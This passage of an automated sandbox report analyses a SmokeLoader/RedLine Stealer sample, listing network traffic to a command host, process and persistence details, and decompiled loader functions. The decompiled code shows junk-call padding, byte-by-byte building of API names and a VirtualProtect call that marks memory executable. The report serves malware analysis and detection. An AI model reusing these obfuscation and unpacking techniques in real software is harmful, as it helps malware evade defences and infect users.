Feb 7, 2023 20:05:06.850774050 CET	49722	80	192.168.2.7	185.246.221.63
Feb 7, 2023 20:05:06.852236986 CET	49722	80	192.168.2.7	185.246.221.63
Feb 7, 2023 20:05:06.880031109 CET	80	49722	185.246.221.63	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 7, 2023 20:05:06.647430897 CET	51007	53	192.168.2.7	8.8.8.8
Feb 7, 2023 20:05:06.667443037 CET	53	51007	8.8.8.8	192.168.2.7
Feb 7, 2023 20:05:06.864218950 CET	50513	53	192.168.2.7	8.8.8.8
Feb 7, 2023 20:05:07.911704063 CET	50513	53	192.168.2.7	8.8.8.8
Feb 7, 2023 20:05:08.936582088 CET	50513	53	192.168.2.7	8.8.8.8
Feb 7, 2023 20:05:10.893774986 CET	53	50513	8.8.8.8	192.168.2.7
Feb 7, 2023 20:05:11.939722061 CET	53	50513	8.8.8.8	192.168.2.7
Feb 7, 2023 20:05:12.966223001 CET	53	50513	8.8.8.8	192.168.2.7

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Feb 7, 2023 20:05:11.939827919 CET	192.168.2.7	8.8.8.8	cffa	(Port unreachable)	Destination Unreachable
Feb 7, 2023 20:05:12.966365099 CET	192.168.2.7	8.8.8.8	cffa	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 7, 2023 20:05:06.647430897 CET	192.168.2.7	8.8.8.8	0x921e	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Feb 7, 2023 20:05:06.864218950 CET	192.168.2.7	8.8.8.8	0x19d6	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false
Feb 7, 2023 20:05:07.911704063 CET	192.168.2.7	8.8.8.8	0x19d6	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false
Feb 7, 2023 20:05:08.936582088 CET	192.168.2.7	8.8.8.8	0x19d6	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 7, 2023 20:05:06.667443037 CET	8.8.8.8	192.168.2.7	0x921e	No error (0)	host-file-host6.com		185.246.221.63	A (IP address)	IN (0x0001)	false
Feb 7, 2023 20:05:10.893774986 CET	8.8.8.8	192.168.2.7	0x19d6	Server failure (2)	host-host-file8.com	none	none	A (IP address)	IN (0x0001)	false
Feb 7, 2023 20:05:11.939722061 CET	8.8.8.8	192.168.2.7	0x19d6	Server failure (2)	host-host-file8.com	none	none	A (IP address)	IN (0x0001)	false
Feb 7, 2023 20:05:12.966223001 CET	8.8.8.8	192.168.2.7	0x19d6	Server failure (2)	host-host-file8.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

uclahet.com

host-file-host6.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49722	185.246.221.63	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:05:06.705308914 CET	284	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uclahet.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 306 Host: host-file-host6.com
Feb 7, 2023 20:05:06.705343962 CET	284	OUT	Data Raw: 10 87 f6 99 6d 82 a7 b5 c2 37 77 41 79 ca e4 8f 31 62 a3 46 d2 41 68 9b be eb a8 85 fb a1 95 80 6c b5 59 a5 11 1c c4 92 e8 d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd ce f0 d8 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 31 82 a4 7a Data Ascii: m7wAy1bFAhlYwmwu$f]d1ze\|}gh&**Znv9:"ceHb7i6\|\L7[As[qk.%?0=SiLH<+&2S!>w(quFE!D
Feb 7, 2023 20:05:06.850627899 CET	285	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Tue, 07 Feb 2023 19:05:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a Data Ascii: fYour IP blocked0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 5856, Parent PID: 3320

General

Target ID:	0
Start time:	20:04:48
Start date:	07/02/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	198144 bytes
MD5 hash:	04A988E37B8EA5FACD28A7D42764F597
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.270582685.00000000005B6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: file.exePID: 1720, Parent PID: 5856

General

Target ID:	1
Start time:	20:04:54
Start date:	07/02/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	198144 bytes
MD5 hash:	04A988E37B8EA5FACD28A7D42764F597
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3320, Parent PID: 1720

General

Target ID:	2
Start time:	20:05:00
Start date:	07/02/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff75ed40000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: vhefigiPID: 4520, Parent PID: 1100

General

Target ID:	11
Start time:	20:05:41
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Roaming\vhefigi
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\vhefigi
Imagebase:	0x400000
File size:	198144 bytes
MD5 hash:	04A988E37B8EA5FACD28A7D42764F597
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.387762045.00000000008C6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 46%, ReversingLabs Detection: 36%, Virustotal, Browse
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: vhefigiPID: 4556, Parent PID: 4520

General

Target ID:	12
Start time:	20:05:49
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Roaming\vhefigi
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\vhefigi
Imagebase:	0x400000
File size:	198144 bytes
MD5 hash:	04A988E37B8EA5FACD28A7D42764F597
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.398871259.0000000002070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000002.398871259.0000000002070000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.398929809.0000000002091000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000002.398929809.0000000002091000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 5856, Parent PID: 3320COMMON

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	4.2%
Signature Coverage:	3.4%
Total number of Nodes:	1397
Total number of Limit Nodes:	12

Executed Functions

Function 00404BB9 Relevance: 98.3, APIs: 49, Strings: 7, Instructions: 289
memorylibrarytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00404BB9(void* __edx) {
				char _v2048;
				char _v2056;
				short _v2064;
				char _v3072;
				char _v3088;
				struct _OSVERSIONINFOEXA _v3232;
				intOrPtr _v3256;
				char _v3272;
				CHAR* _v3276;
				long _v3280;
				struct _CONSOLE_CURSOR_INFO _v3292;
				char _v3296;
				char _v3304;
				intOrPtr _t34;
				void* _t88;
				WCHAR* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				intOrPtr* _t101;
				CHAR* _t103;

				_t94 = 0;
				L1:
				L1:
				if(_t94 < 0x1ef75) {
					GetComboBoxInfo(0, 0);
					SetLastError(0);
				}
				if(_t94 <= 0x1ea055ff || _v3280 == 0xacef98 || _v3256 == 0xad6910c) {
					goto L6;
				}
				L7:
				_t88 = 0;
				do {
					if(_t88 == 0x13e6) {
						 *0x557154 =  *0x557154 + 0x38d6;
					}
					_t88 = _t88 + 1;
				} while (_t88 < 0x31a652);
				E00404BA5();
				_t95 = 0x962a52;
				do {
					if( *0x557154 == 0x139) {
						FindNextFileW(0,  &_v3072);
					}
					if( *0x557154 == 0x71f) {
						EnumCalendarInfoW(0, 0, 0, 0);
						VerifyVersionInfoA( &_v3232, 0, 0);
						EnumTimeFormatsA(0, 0, 0);
						InterlockedDecrement( &(_v3292.bVisible));
						__imp__GetLongPathNameW(L"jotexavehuhuyezorozilabuloboxelaheyonuzepisaxabahoxayeponepe",  &_v2056, 0, 0);
						WaitForSingleObject(0, 0);
						__imp__QueryMemoryResourceNotification(0,  &_v3296);
					}
					_t95 = _t95 - 1;
				} while (_t95 != 0);
				_t34 =  *0x557154; // 0x11b88
				if(_t34 > 0) {
					do {
						if(_t34 == 0xfe) {
							GetUserDefaultLangID();
							WritePrivateProfileStringA(0, 0, 0, 0);
							__imp__AddRefActCtx(0);
						}
						E004045DF(_t95);
						if( *0x557154 == 0x29) {
							__imp__MoveFileWithProgressA("berimilipuhonovoci", "zatojoranidohogeroxadarur hamoc tukona ceyutinaxakaxibagucilawer bezelotuyariyaluciyorep", 0, 0, 0);
						}
						_t34 =  *0x557154; // 0x11b88
						_t95 = _t95 + 1;
					} while (_t95 < _t34);
				}
				_t123 = _t34 - 0x19c;
				if(_t34 == 0x19c) {
					_t101 = __imp__DeleteVolumeMountPointA;
					 *_t101(0);
					__imp__CreateActCtxA( &_v3272);
					EnumTimeFormatsA(0, 0, 0);
					_hwrite(0, "cesojonuravepagiwamiru fuhuboh xozopogiyagu vah sogevozapuyulov", 0);
					SetHandleInformation(0, 0, 0);
					EnumResourceLanguagesA(0, 0, 0, 0, 0);
					CreateNamedPipeA(0, 0, 0, 0, 0, 0, 0, 0);
					GetCurrentProcessId();
					GetComputerNameA( &_v3088,  &_v3292);
					GetLocaleInfoW(0, 0,  &_v2064, 0);
					HeapAlloc(0, 0, 0);
					GetModuleHandleW(0);
					__imp__SetVolumeMountPointW(0, 0);
					E00403CA0(_t123,  &_v3304, 0);
					FindResourceW(0, 0, 0);
					 *_t101(0);
					__imp__GetConsoleAliasesLengthA(0);
				}
				_t96 = 0;
				_t103 = "msimg32.dll";
				do {
					if(_t96 == 0xab9d) {
						 *0x557150 = LoadLibraryA(_t103);
					}
					_t96 = _t96 + 1;
				} while (_t96 < 0x2594b);
				"msimg32.dll" = 0;
				_t97 = 0;
				do {
					if(_t97 == 0x148) {
						E004046F6();
					}
					_t97 = _t97 + 1;
				} while (_t97 < 0x71761d);
				E004045B7( *0x5565f8,  *0x557154, 0x41a010);
				_t98 = 0;
				do {
					GlobalFlags(0); // executed
					if(_t98 == 0x30f4) {
						E004046E7();
					}
					_t98 = _t98 + 1;
				} while (_t98 < 0x48122);
				_t99 = 0xdd7b3;
				do {
					if( *0x557154 == 0x21) {
						WritePrivateProfileSectionA(0, 0, 0);
						__imp__GetConsoleAliasW(0,  &_v2048, 0, 0);
						SetConsoleCursorInfo(0,  &_v3292);
						GetProfileSectionA("kinalanar",  &_v3088, 0);
					}
					_t99 = _t99 - 1;
				} while (_t99 != 0);
				M0042D4A9 = 0x73;
				"mg32.dll" = 0x6d;
				M0042D4AC = 0x67;
				M0042D4AA = 0x69;
				 *0x42d4b2 = 0x6c;
				 *0x42d4ae = 0x32;
				 *0x42d4b1 = 0x6c;
				 *0x42d4b3 = 0;
				"32.dll" = 0x33;
				 *0x42d4b0 = 0x64;
				"msimg32.dll" = 0x6d;
				 *0x42d4af = 0x2e; // executed
				LoadLibraryA(_t103); // executed
				_t100 = 0x1ef75;
				do {
					GetLastError();
					_t100 = _t100 - 1;
				} while (_t100 != 0);
				if( *0x557154 == 0x58c) {
					EndUpdateResourceA(0, 0);
					GetModuleHandleW(L"befiray");
					FreeConsole();
					FindResourceW(0, 0, 0);
					SearchPathA(0, 0, 0, 0,  &_v3072,  &_v3276);
					GetConsoleTitleA( &_v2048, 0);
					OpenMutexW(0, 0, 0);
					GetUserDefaultLangID();
					InterlockedExchange(0, 0);
					GetBinaryTypeW(0,  &_v3280);
					GetCommandLineW();
				}
				E004046E0();
				return 0;
				L6:
				_t94 = _t94 + 1;
				if(_t94 < 0x8deecc68) {
					goto L1;
				}
				goto L7;
			}

0x00404bc3
0x00000000
0x00404bc5
0x00404bcb
0x00404bcf
0x00404bd6
0x00404bd6
0x00404be2
0x00000000
0x00000000
0x00404c01
0x00404c01
0x00404c03
0x00404c09
0x00404c10
0x00404c10
0x00404c16
0x00404c17
0x00404c21
0x00404c2c
0x00404c31
0x00404c3b
0x00404c46
0x00404c46
0x00404c56
0x00404c5c
0x00404c6a
0x00404c73
0x00404c7a
0x00404c8e
0x00404c96
0x00404ca2
0x00404ca2
0x00404ca8
0x00404ca8
0x00404cab
0x00404cb2
0x00404cb4
0x00404cb9
0x00404cbb
0x00404cc5
0x00404ccc
0x00404ccc
0x00404cd3
0x00404cdf
0x00404cee
0x00404cee
0x00404cf4
0x00404cf9
0x00404cfa
0x00404cb4
0x00404cfe
0x00404d03
0x00404d09
0x00404d10
0x00404d17
0x00404d20
0x00404d29
0x00404d32
0x00404d3d
0x00404d4b
0x00404d51
0x00404d64
0x00404d75
0x00404d7e
0x00404d85
0x00404d8d
0x00404d99
0x00404da1
0x00404da8
0x00404dab
0x00404dab
0x00404db7
0x00404db9
0x00404dbe
0x00404dc4
0x00404dc9
0x00404dc9
0x00404dce
0x00404dcf
0x00404dd7
0x00404ddd
0x00404ddf
0x00404de5
0x00404de7
0x00404de7
0x00404dec
0x00404ded
0x00404e06
0x00404e0b
0x00404e0d
0x00404e0e
0x00404e1a
0x00404e1c
0x00404e1c
0x00404e21
0x00404e22
0x00404e2a
0x00404e2f
0x00404e36
0x00404e3b
0x00404e4c
0x00404e58
0x00404e6c
0x00404e6c
0x00404e72
0x00404e72
0x00404e76
0x00404e7d
0x00404e84
0x00404e8b
0x00404e92
0x00404e99
0x00404ea0
0x00404ea7
0x00404ead
0x00404eb4
0x00404ebb
0x00404ec2
0x00404ec9
0x00404ecc
0x00404ed2
0x00404ed2
0x00404ed8
0x00404ed8
0x00404ee5
0x00404ee9
0x00404ef4
0x00404efa
0x00404f03
0x00404f1a
0x00404f29
0x00404f32
0x00404f38
0x00404f40
0x00404f4c
0x00404f52
0x00404f52
0x00404f58
0x00404f67
0x00404bf8
0x00404bf8
0x00404bff
0x00000000
0x00000000
0x00000000

APIs

GetComboBoxInfo.USER32(00000000,00000000,00000000), ref: 00404BCF
SetLastError.KERNEL32(00000000), ref: 00404BD6
FindNextFileW.KERNEL32(00000000,?,0079A862,?,00000000), ref: 00404C46
EnumCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000,0079A862,?,00000000), ref: 00404C5C
VerifyVersionInfoA.KERNEL32(?,00000000,00000000,00000000), ref: 00404C6A
EnumTimeFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00404C73
InterlockedDecrement.KERNEL32(?), ref: 00404C7A
GetLongPathNameW.KERNEL32(jotexavehuhuyezorozilabuloboxelaheyonuzepisaxabahoxayeponepe,?,00000000), ref: 00404C8E
WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 00404C96
QueryMemoryResourceNotification.KERNEL32(00000000,?,?,00000000), ref: 00404CA2
GetUserDefaultLangID.KERNEL32(0079A862,?,00000000), ref: 00404CBB
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404CC5
AddRefActCtx.KERNEL32(00000000,?,00000000), ref: 00404CCC
MoveFileWithProgressA.KERNEL32 ref: 00404CEE
DeleteVolumeMountPointA.KERNEL32 ref: 00404D10
CreateActCtxA.KERNEL32 ref: 00404D17
EnumTimeFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00404D20
_hwrite.KERNEL32(00000000,cesojonuravepagiwamiru fuhuboh xozopogiyagu vah sogevozapuyulov,00000000), ref: 00404D29
SetHandleInformation.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404D32
EnumResourceLanguagesA.KERNEL32 ref: 00404D3D
CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404D4B
GetCurrentProcessId.KERNEL32(?,00000000), ref: 00404D51
GetComputerNameA.KERNEL32 ref: 00404D64
GetLocaleInfoW.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 00404D75
HeapAlloc.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404D7E
GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00404D85
SetVolumeMountPointW.KERNEL32(00000000,00000000), ref: 00404D8D
FindResourceW.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000), ref: 00404DA1
DeleteVolumeMountPointA.KERNEL32 ref: 00404DA8
GetConsoleAliasesLengthA.KERNEL32(00000000,?,00000000), ref: 00404DAB
LoadLibraryA.KERNEL32(msimg32.dll,0079A862,?,00000000), ref: 00404DC7
GlobalFlags.KERNEL32(00000000), ref: 00404E0E
WritePrivateProfileSectionA.KERNEL32(00000000,00000000,00000000), ref: 00404E3B
GetConsoleAliasW.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 00404E4C
SetConsoleCursorInfo.KERNEL32(00000000,?,?,00000000), ref: 00404E58
GetProfileSectionA.KERNEL32(kinalanar,?,00000000), ref: 00404E6C
LoadLibraryA.KERNELBASE(msimg32.dll,?,00000000), ref: 00404EC9
GetLastError.KERNEL32 ref: 00404ED2
EndUpdateResourceA.KERNEL32 ref: 00404EE9
GetModuleHandleW.KERNEL32(befiray), ref: 00404EF4
FreeConsole.KERNEL32 ref: 00404EFA
FindResourceW.KERNEL32(00000000,00000000,00000000), ref: 00404F03
SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00404F1A
GetConsoleTitleA.KERNEL32(?,00000000), ref: 00404F29
OpenMutexW.KERNEL32(00000000,00000000,00000000), ref: 00404F32
GetUserDefaultLangID.KERNEL32 ref: 00404F38
InterlockedExchange.KERNEL32(00000000,00000000), ref: 00404F40
GetBinaryTypeW.KERNEL32(00000000,?), ref: 00404F4C
GetCommandLineW.KERNEL32 ref: 00404F52

Strings

msimg32.dll, xrefs: 00404DB9, 00404DC6, 00404DD7, 00404E75
cesojonuravepagiwamiru fuhuboh xozopogiyagu vah sogevozapuyulov, xrefs: 00404D23
kinalanar, xrefs: 00404E67
befiray, xrefs: 00404EEF
berimilipuhonovoci, xrefs: 00404CE9
jotexavehuhuyezorozilabuloboxelaheyonuzepisaxabahoxayeponepe, xrefs: 00404C89
zatojoranidohogeroxadarur hamoc tukona ceyutinaxakaxibagucilawer bezelotuyariyaluciyorep, xrefs: 00404CE4

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ConsoleInfoResource$Enum$FindHandleMountPointProfileVolume$CreateDefaultDeleteErrorFileFormatsInterlockedLangLastLibraryLoadModuleNamePathPrivateSectionTimeUserWrite$AliasAliasesAllocBinaryCalendarComboCommandComputerCurrentCursorDecrementExchangeFlagsFreeGlobalHeapInformationLanguagesLengthLineLocaleLongMemoryMoveMutexNamedNextNotificationObjectOpenPipeProcessProgressQuerySearchSingleStringTitleTypeUpdateVerifyVersionWaitWith_hwrite
String ID: befiray$berimilipuhonovoci$cesojonuravepagiwamiru fuhuboh xozopogiyagu vah sogevozapuyulov$jotexavehuhuyezorozilabuloboxelaheyonuzepisaxabahoxayeponepe$kinalanar$msimg32.dll$zatojoranidohogeroxadarur hamoc tukona ceyutinaxakaxibagucilawer bezelotuyariyaluciyorep
API String ID: 667134268-3466078028
Opcode ID: ce696f204f75d701fc62a729d79aa2a8789e8607b65b4eb49400fa8afa3fd516
Instruction ID: e34e32465fad60da0cc5aa76c82a97f206e2cfed7bea4b7a2ee7bdb58a49d0d5
Opcode Fuzzy Hash: ce696f204f75d701fc62a729d79aa2a8789e8607b65b4eb49400fa8afa3fd516
Instruction Fuzzy Hash: 3A9144F1804288AFE7116BB4EEC8EAB77ACEB54345F004436F686B2571D63C5C858B79

Uniqueness

Uniqueness Score: -1.00%

Function 004046F6 Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 195
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004046F6() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				long _v132;
				int _t364;
				CHAR* _t390;

				_t390 = "msimg32.dll";
				 *0x42d4ae = 0x33;
				 *0x42d4af = 0x32;
				 *0x42d4b3 = 0x6c;
				 *0x42d4b2 = 0x6c;
				"mg32.dll" = 0x6e;
				"32.dll" = 0x6c;
				"msimg32.dll" = 0x6b;
				M0042D4AC = 0x65;
				M0042D4AA = 0x72;
				 *0x42d4b0 = 0x2e;
				 *0x42d4b1 = 0x64;
				M0042D4A9 = 0x65;
				 *0x42d4b4 = 0;
				 *0x557150 = LoadLibraryA(_t390);
				_v72 = 0x368418b0;
				_v40 = 0x61a1c405;
				_v96 = 0xc095e74;
				_v92 = 0x78f2afd3;
				_v32 = 0x55578391;
				_v120 = 0x26209a8a;
				_v80 = 0x38e0c823;
				_v100 = 0x605fdad6;
				_v108 = 0x5bedd06e;
				_v12 = 0x3d0c83c9;
				_v16 = 0x701f6b66;
				_v104 = 0x1ab29123;
				_v4 = 0x39d6e811;
				_v76 = 0x7476a3f3;
				_v56 = 0x188989be;
				_v124 = 0x3dcede25;
				_v116 = 0x25b0a5a6;
				_v44 = 0x3e1d73b5;
				_v20 = 0x5dc103a9;
				_v112 = 0x748a784f;
				_v52 = 0x1c882e17;
				_v28 = 0x406ee06d;
				_v36 = 0x792cf4fa;
				_v24 = 0x1681d686;
				_v128 = 0x7f744a26;
				_v88 = 0x108aa678;
				_v60 = 0x2e8d3777;
				_v64 = 0x41178626;
				_v48 = 0x14922f4a;
				_v84 = 0x7cab3473;
				_v68 = 0x6cac10f2;
				_v8 = 0x51eed42d;
				_v72 = _v72 + 0x69dacef5;
				_v96 = _v96 + 0x2760e5e8;
				_v72 = _v72 - 0x768b5f15;
				_v96 = _v96 - 0x3bc9a4f0;
				_v92 = _v92 - 0x72691ce;
				_v96 = _v96 - 0x644e11b3;
				_v32 = _v32 - 0x3df40d01;
				_v40 = _v40 - 0x7967fa1d;
				_v40 = _v40 + 0x3be9f591;
				_v80 = _v80 - 0x1121ea27;
				_v96 = _v96 - 0x7cbb076b;
				_v96 = _v96 + 0x206fed4a;
				_v80 = _v80 - 0x549eff17;
				_v12 = _v12 - 0x2562e24a;
				_v104 = _v104 - 0x75df3b9c;
				_v80 = _v80 - 0x599aac00;
				_v96 = _v96 - 0x6eafd6b5;
				_v32 = _v32 + 0x652fee1b;
				_v96 = _v96 + 0x378e6798;
				_v32 = _v32 - 0x47a46c3c;
				_v32 = _v32 - 0x298f1a4d;
				_v40 = _v40 - 0x133da9a;
				_v16 = _v16 - 0x613763c9;
				_v56 = _v56 + 0xefa2a6e;
				_v96 = _v96 + 0x693d074f;
				_v116 = _v116 + 0x51836527;
				_v80 = _v80 - 0x224dfef1;
				_v4 = _v4 - 0x20dfe821;
				_v20 = _v20 - 0x3926fb15;
				_v108 = _v108 + 0x754a3cb6;
				_v96 = _v96 + 0x14ca3371;
				_v120 = _v120 - 0x53af86fd;
				_v104 = _v104 + 0x1062ce7e;
				_v80 = _v80 + 0x16bc329e;
				_v76 = _v76 + 0x36b97358;
				_v76 = _v76 - 0x58b9c9d1;
				_v4 = _v4 + 0x53ef8e84;
				_v124 = _v124 + 0x2b21d1b4;
				_v108 = _v108 + 0x4a47916a;
				_v76 = _v76 - 0x7e41ff47;
				_v72 = _v72 - 0x20152b96;
				_v64 = _v64 - 0x2eadfab7;
				_v52 = _v52 - 0x5608305c;
				_v104 = _v104 + 0x47182c2f;
				 *0x42d4b3 = 0x65;
				M0042D4A9 = 0x69;
				M0042D4AC = 0x75;
				 *0x42d4ae = 0x6c;
				"32.dll" = 0x61;
				 *0x42d4b1 = 0x6f;
				 *0x42d4b5 = 0x74;
				"msimg32.dll" = 0x56;
				 *0x42d4b4 = 0x63;
				 *0x42d4af = 0x50;
				 *0x42d4b6 = 0;
				"mg32.dll" = 0x74;
				 *0x42d4b2 = 0x74;
				M0042D4AA = 0x72;
				 *0x42d4b0 = 0x72;
				"`g)wmsimg32.dll" = GetProcAddress( *0x557150, _t390);
				_t364 = VirtualProtect( *0x5565f8,  *0x557154, 0x40,  &_v132); // executed
				return _t364;
			}

0x004046fd
0x00404703
0x0040470a
0x00404711
0x00404718
0x0040471f
0x00404726
0x0040472d
0x00404734
0x0040473b
0x00404742
0x00404749
0x00404750
0x00404757
0x00404764
0x00404769
0x00404771
0x00404779
0x00404781
0x00404789
0x00404791
0x00404799
0x004047a1
0x004047a9
0x004047b1
0x004047b9
0x004047c1
0x004047c9
0x004047d4
0x004047dc
0x004047e4
0x004047ec
0x004047f4
0x004047fc
0x00404804
0x0040480c
0x00404814
0x0040481c
0x00404824
0x0040482c
0x00404834
0x0040483c
0x00404844
0x0040484c
0x00404854
0x0040485c
0x00404864
0x00404889
0x00404891
0x00404899
0x004048a1
0x004048b6
0x004048be
0x004048c6
0x004048e8
0x004048fd
0x00404912
0x0040491a
0x00404922
0x0040492a
0x0040493f
0x00404947
0x0040494f
0x00404964
0x0040496c
0x00404981
0x00404996
0x0040499e
0x004049a6
0x004049bb
0x004049c3
0x004049cb
0x004049d3
0x00404a02
0x00404a0a
0x00404a22
0x00404a2a
0x00404a3f
0x00404a47
0x00404a4f
0x00404a57
0x00404a6c
0x00404a74
0x00404a7c
0x00404a87
0x00404a8f
0x00404a97
0x00404ad3
0x00404ae8
0x00404af0
0x00404af8
0x00404b14
0x00404b1b
0x00404b22
0x00404b29
0x00404b30
0x00404b37
0x00404b3e
0x00404b45
0x00404b4c
0x00404b53
0x00404b5a
0x00404b61
0x00404b68
0x00404b6f
0x00404b76
0x00404b90
0x00404b9b
0x00404ba4

APIs

